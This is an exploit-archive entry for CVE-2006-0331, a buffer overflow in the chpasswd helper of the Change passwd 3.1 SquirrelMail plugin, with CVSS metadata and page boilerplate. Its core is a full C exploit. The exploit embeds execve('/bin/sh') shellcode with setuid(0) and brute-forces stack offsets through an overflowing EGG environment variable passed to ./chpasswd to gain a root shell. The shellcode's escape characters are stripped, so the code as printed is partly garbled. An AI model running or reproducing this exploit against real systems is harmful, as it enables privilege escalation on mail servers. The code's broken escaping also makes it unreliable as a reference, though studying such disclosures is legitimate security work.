Change passwd 3.1 (SquirrelMail plugin )

2006.01.21
Credit: RoD hEDoR
Risk: Medium
Local: No
Remote: Yes
CVE: CVE-2006-0331
CWE: CWE-Other


CVSS Base Score: 4.6/10
Impact Subscore: 6.4/10
Exploitability Subscore: 3.9/10
Exploit range: Local
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

Change passwd 3.1 (SquirrelMail plugin ) Coded by rod hedor web-- http://lezr.com [local exploit] * Multiple buffer overflows are present in the handling of command line arguements in chpasswd. The bug allows a hacker to exploit the process to run arbitrary code. #include <stdio.h> #include <stdlib.h> const char shellcode[]="x90x90x90x90x90x90x90x90" "x90x90x90x90x90x90x90x90" "x90x90x90x90x90x90x90x90" "x31xc0xb0x17x31xdbxcdx80" "x89xe5x31xc0x50x55x89xe5" "x50x68x6ex2fx73x68x68x2f" "x2fx62x69x89xe3x89xe9x89" "xeaxb0x0bxcdx80"; long get_sp(){ __asm__("movl %esp,%eax;"); }; int main(){ char buffer[1024]; long stack = get_sp(); int result = 1; long offset = 0; printf ("[!] Change_passwd v3.1(SquirrelMail plugin) exploitn"); printf ("[+] Current stack [0x%x]n",stack); while(offset <= 268435456){ offset = offset + 1; stack = get_sp() + offset; memcpy(&buffer,"EGG=",4); int a = 4; while(a <= 108){ memcpy(&buffer[a],"x",1); a = a + 1;} memcpy(&buffer[108],&stack,4); memcpy(&buffer[112],&shellcode,sizeof(shellcode)); putenv(buffer); result = system("./chpasswd $EGG"); if(result == 0){exit(0);}; }; }; _________________________________________________________________ FREE pop-up blocking with the new MSN Toolbar - get it now! http://toolbar.msn.click-url.com/go/onm00200415ave/direct/01/


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top